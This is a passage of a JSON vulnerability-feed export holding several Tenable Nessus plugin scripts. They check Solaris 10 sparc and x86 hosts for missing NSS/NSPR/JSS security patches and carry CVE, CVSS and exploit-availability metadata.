NSPR_LOG_FILE Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119213\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-31\", obsoleted_by:\"\", package:\"SUNWjss\", version:\"4.0,REV=2004.11.05.02.31\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-31\", obsoleted_by:\"\", package:\"SUNWpr\", version:\"4.5.1,REV=2004.11.05.02.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-31\", obsoleted_by:\"\", package:\"SUNWprd\", version:\"4.5.1,REV=2004.11.05.02.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-31\", obsoleted_by:\"\", package:\"SUNWtls\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-31\", obsoleted_by:\"\", package:\"SUNWtlsd\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\nif 
(solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-31\", obsoleted_by:\"\", package:\"SUNWtlsu\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjss / SUNWpr / SUNWprd / SUNWtls / SUNWtlsd / SUNWtlsu\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:00:36", "description": "NSS_NSPR_JSS 3.30.2_x86: NSPR 4.15 / NSS 3.30.2 / JSS 4.3.2.\nDate this patch was last updated by Sun : Nov/11/17", "edition": 25, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (x86) : 119214-36", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4339", "CVE-2006-4842", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119214", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_X86_119214-36.NASL", "href": "https://www.tenable.com/plugins/nessus/107816", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107816);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-4339\", \"CVE-2006-4842\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 10 (x86) : 119214-36\");\n script_summary(english:\"Check for patch 119214-36\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing 
Sun Security Patch number 119214-36\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"NSS_NSPR_JSS 3.30.2_x86: NSPR 4.15 / NSS 3.30.2 / JSS 4.3.2.\nDate this patch was last updated by Sun : Nov/11/17\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119214-36\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119214-36 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-7140\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Solaris libnspr NSPR_LOG_FILE Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119214\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-36\", obsoleted_by:\"\", package:\"SUNWjss\", version:\"4.0,REV=2004.11.05.03.05\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-36\", obsoleted_by:\"\", package:\"SUNWpr\", version:\"4.5.1,REV=2004.11.05.03.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-36\", obsoleted_by:\"\", package:\"SUNWprd\", version:\"4.5.1,REV=2004.11.05.03.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-36\", obsoleted_by:\"\", package:\"SUNWtls\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-36\", obsoleted_by:\"\", package:\"SUNWtlsd\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\nif 
(solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-36\", obsoleted_by:\"\", package:\"SUNWtlsu\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjss / SUNWpr / SUNWprd / SUNWtls / SUNWtlsd / SUNWtlsu\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:00:23", "description": "NSS_NSPR_JSS 3.21: NSPR 4.11 / NSS 3.21 /.\nDate this patch was last updated by Sun : Mar/22/16", "edition": 23, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (sparc) : 119213-33", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4339", "CVE-2006-4842", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119213", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_119213-33.NASL", "href": "https://www.tenable.com/plugins/nessus/107312", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107312);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-4339\", \"CVE-2006-4842\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 10 (sparc) : 119213-33\");\n script_summary(english:\"Check for patch 119213-33\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security 
Patch number 119213-33\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"NSS_NSPR_JSS 3.21: NSPR 4.11 / NSS 3.21 /.\nDate this patch was last updated by Sun : Mar/22/16\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119213-33\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119213-33 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-7140\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Solaris libnspr NSPR_LOG_FILE Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119213\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-33\", obsoleted_by:\"\", package:\"SUNWjss\", version:\"4.0,REV=2004.11.05.02.31\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-33\", obsoleted_by:\"\", package:\"SUNWpr\", version:\"4.5.1,REV=2004.11.05.02.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-33\", obsoleted_by:\"\", package:\"SUNWprd\", version:\"4.5.1,REV=2004.11.05.02.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-33\", obsoleted_by:\"\", package:\"SUNWtls\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-33\", obsoleted_by:\"\", package:\"SUNWtlsd\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\nif 
(solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-33\", obsoleted_by:\"\", package:\"SUNWtlsu\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjss / SUNWpr / SUNWprd / SUNWtls / SUNWtlsd / SUNWtlsu\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:00:23", "description": "NSS_NSPR_JSS 3.30.2: NSPR 4.15 / NSS 3.30.2 / JSS 4.3.2.\nDate this patch was last updated by Sun : Nov/09/17", "edition": 24, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (sparc) : 119213-36", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4339", "CVE-2006-4842", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119213", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_119213-36.NASL", "href": "https://www.tenable.com/plugins/nessus/107313", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107313);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-4339\", \"CVE-2006-4842\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 10 (sparc) : 119213-36\");\n script_summary(english:\"Check for patch 119213-36\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun 
Security Patch number 119213-36\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"NSS_NSPR_JSS 3.30.2: NSPR 4.15 / NSS 3.30.2 / JSS 4.3.2.\nDate this patch was last updated by Sun : Nov/09/17\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119213-36\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119213-36 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-7140\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Solaris libnspr NSPR_LOG_FILE Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119213\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-36\", obsoleted_by:\"\", package:\"SUNWjss\", version:\"4.0,REV=2004.11.05.02.31\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-36\", obsoleted_by:\"\", package:\"SUNWpr\", version:\"4.5.1,REV=2004.11.05.02.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-36\", obsoleted_by:\"\", package:\"SUNWprd\", version:\"4.5.1,REV=2004.11.05.02.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-36\", obsoleted_by:\"\", package:\"SUNWtls\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-36\", obsoleted_by:\"\", package:\"SUNWtlsd\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\nif 
(solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-36\", obsoleted_by:\"\", package:\"SUNWtlsu\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjss / SUNWpr / SUNWprd / SUNWtls / SUNWtlsd / SUNWtlsu\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:00:36", "description": "NSS_NSPR_JSS 3.17.2_x86: NSPR 4.10.7 / NSS.\nDate this patch was last updated by Sun : Feb/19/15", "edition": 23, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (x86) : 119214-31", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4339", "CVE-2006-4842", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119214", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_X86_119214-31.NASL", "href": "https://www.tenable.com/plugins/nessus/107813", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107813);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-4339\", \"CVE-2006-4842\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 10 (x86) : 119214-31\");\n script_summary(english:\"Check for patch 119214-31\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security 
Patch number 119214-31\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"NSS_NSPR_JSS 3.17.2_x86: NSPR 4.10.7 / NSS.\nDate this patch was last updated by Sun : Feb/19/15\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119214-31\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119214-31 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-7140\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Solaris libnspr NSPR_LOG_FILE Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119214\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-31\", obsoleted_by:\"\", package:\"SUNWjss\", version:\"4.0,REV=2004.11.05.03.05\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-31\", obsoleted_by:\"\", package:\"SUNWpr\", version:\"4.5.1,REV=2004.11.05.03.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-31\", obsoleted_by:\"\", package:\"SUNWprd\", version:\"4.5.1,REV=2004.11.05.03.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-31\", obsoleted_by:\"\", package:\"SUNWtls\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-31\", obsoleted_by:\"\", package:\"SUNWtlsd\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\nif 
(solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-31\", obsoleted_by:\"\", package:\"SUNWtlsu\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjss / SUNWpr / SUNWprd / SUNWtls / SUNWtlsd / SUNWtlsu\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}]}